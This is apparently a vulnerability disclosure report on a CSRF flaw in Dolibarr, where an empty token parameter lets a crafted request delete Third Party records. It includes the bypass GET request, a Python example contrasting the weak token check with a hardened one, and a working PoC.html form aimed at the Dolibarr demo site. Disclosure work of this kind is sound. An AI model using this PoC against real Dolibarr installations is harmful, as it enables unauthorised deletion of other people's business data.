Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr
Valid
Reported on Jul 18th 2021
✍️ Description
An attacker can delete any Third Party of any user through this CSRF vulnerability when an Admin, SuperAdmin or other authorized user opens the PoC.html file; the attacker only needs to know the Third Party id on the server.
I converted the
GET /societe/card.php?socid=2711&action=confirm_delete&confirm=yes&token=74ab7523a2fd5018a5cccdfc8ad74625 HTTP/2
to this
GET /societe/card.php?socid=2711&action=confirm_delete&token=&confirm=yes HTTP/2
and then the CSRF token was bypassed.
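As an added illustration (not Dolibarr's code), the check pattern that lets an empty token parameter through, shown beside a hardened version that rejects a missing or empty token and requires POST for the destructive action. The session token and request URLs are constructed for the example.

```python
import hmac
from urllib.parse import parse_qs, urlparse

# Constructed stand-in for the anti-CSRF token stored in the victim's session
# (not the token value shown in the report).
SESSION_TOKEN = "3f7c1d9e8a2b4c6d0e1f2a3b4c5d6e7f"

# Constructed request targets modelled on the report: one carrying the
# session token, one with the token parameter left empty.
VALID_REQUEST = ("/societe/card.php?socid=2711&action=confirm_delete"
                 "&confirm=yes&token=" + SESSION_TOKEN)
BYPASS_REQUEST = "/societe/card.php?socid=2711&action=confirm_delete&token=&confirm=yes"


def query_params(url):
    """Return the query string as a flat dict; blank values are kept as ''."""
    parsed = parse_qs(urlparse(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in parsed.items()}


def weak_csrf_check(url, session_token):
    """Flawed pattern: the token is only compared when one was supplied,
    so 'token=' (empty) skips the comparison and the action is allowed."""
    token = query_params(url).get("token")
    if token:                      # '' is falsy -> comparison is skipped
        return hmac.compare_digest(token, session_token)
    return True


def strict_csrf_check(url, session_token, method):
    """Hardened check: a destructive action must arrive via POST, the token
    must be present and non-empty, and it is compared in constant time."""
    params = query_params(url)
    if params.get("action") == "confirm_delete" and method != "POST":
        return False               # GET must never mutate state
    token = params.get("token", "")
    if not token or not session_token:
        return False               # missing or empty token is a hard fail
    return hmac.compare_digest(token, session_token)


if __name__ == "__main__":
    print("weak check, empty token  :", weak_csrf_check(BYPASS_REQUEST, SESSION_TOKEN))
    print("strict check, empty token:", strict_csrf_check(BYPASS_REQUEST, SESSION_TOKEN, "POST"))
```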
🕵️♂️ Proof of Concept
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.dolibarr.org/societe/card.php">
<input type="hidden" name="socid" value="2712" />
<input type="hidden" name="action" value="confirm_delete" />
<input type="hidden" name="token" value="" />
<input type="hidden" name="confirm" value="yes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
This vulnerability allows an attacker to delete Third Parties.
We have contacted a member of the dolibarr team and are waiting to hear back.